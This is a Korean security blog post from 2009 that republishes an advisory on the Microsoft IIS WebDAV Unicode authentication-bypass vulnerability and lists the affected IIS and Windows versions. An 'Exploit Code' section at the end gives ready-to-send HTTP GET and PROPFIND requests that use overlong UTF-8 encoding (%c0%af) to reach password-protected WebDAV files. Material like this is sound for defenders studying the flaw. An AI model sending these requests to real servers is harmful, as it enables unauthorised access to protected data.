본문 바로가기
취약점소식

Microsoft IIS Unicode Requests to WebDAV Multiple Authentication Bypass Vulnerabilities

by 잡다한 처리 2009. 5. 19.
반응형



Microsoft Internet Information Service (IIS) is prone to multiple authentication-bypass vulnerabilities because the application fails to properly enforce access restrictions on certain requests to password-protected WebDAV folders.

An attacker can exploit these issues to gain unauthorized access to protected WebDAV resources, which may lead to other attacks.

* 취약점이 존재 하는 목록
Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition

Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional

Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server 

* Exploit Code

GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: www.example.com

GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: www.example.com

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: www.example.com
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

저작자표시 비영리 변경금지

'취약점소식' 카테고리의 다른 글

MS Office Zero-Day 취약점 관련 악성코드 주의  (2) 2009.07.15
[IE7,8]Multiple Exploiting IE8/IE7 XSS Vulnerability  (0) 2009.06.23
[AdobeReader]Adobe Reader 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit  (2) 2009.04.30
[AdobeReader]Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit  (0) 2009.04.30
[AdobeReader]Adobe Reader (getAnnots() 등)취약점으로 인한 피해 주의  (0) 2009.04.29

관련글

댓글

티스토리툴바